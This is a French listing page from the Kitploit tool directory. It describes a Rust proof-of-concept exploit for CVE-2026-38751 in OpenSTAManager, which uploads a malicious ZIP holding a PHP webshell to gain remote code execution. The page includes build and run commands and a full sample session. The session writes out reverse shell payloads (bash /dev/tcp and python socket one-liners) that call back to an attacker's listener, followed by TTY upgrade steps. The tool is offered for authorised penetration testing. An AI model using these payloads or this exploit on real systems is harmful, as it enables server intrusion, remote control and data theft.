Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
Outils/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
Analyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

Voir le dépôt
8il y a 1 moisPas encore vérifié

Exploit RCE OpenSTAManager (CVE-2026-38751)

Téléversement de fichier arbitraire menant à l’exécution de code à distance
Preuve de concept complète pour CVE-2026-38751, écrite en Rust.

Avertissement : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins pédagogiques. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d’une autorisation explicite de test.


Description

OpenSTAManager ≤ 2.10 est vulnérable à un téléversement arbitraire de fichier authentifié qui permet à un attaquant de téléverser une archive ZIP malveillante contenant un webshell PHP. Ce PoC automatise le processus :

  • Connexion avec des identifiants valides
  • Téléversement d’un module malveillant avec un webshell
  • Vérification de la vulnérabilité
  • Shell web interactif (exécution de commandes)
  • Shell inversé avec gestion TTY (plusieurs payloads)
  • Nettoyage de la backdoor téléversée

Fonctionnalités

FonctionnalitéDescription
ConnexionS’authentifie à l’aide des identifiants fournis.
Génération ZIPCrée un fichier ZIP avec un descripteur MODULE valide et un shell PHP.
Téléversement de fichierEnvoie le ZIP malveillant via le mécanisme de mise à jour.
VérificationVérifie si le shell est accessible et exécute une commande de test (id).
Shell web interactifPermet d’exécuter des commandes en interactif via le webshell (-i).
Shell inverséEnvoie plusieurs payloads (bash, python, base64, nc, mkfifo) pour obtenir un shell.
Instructions d’amélioration TTYAffiche un guide pas à pas pour obtenir un TTY entièrement interactif.
NettoyageSupprime automatiquement le shell.php téléversé (sauf avec --no-cleanup).

🛠️ Prérequis

  • Rust (1.70+)
  • Une cible exécutant OpenSTAManager ≤ 2.10.
  • Un compte utilisateur valide (avec mot de passe) pour se connecter.

Installation

Clonez le dépôt et compilez le binaire :

root@kitploit:~
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

Exemple :

root@kitploit:~
$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
Télécharger l’outil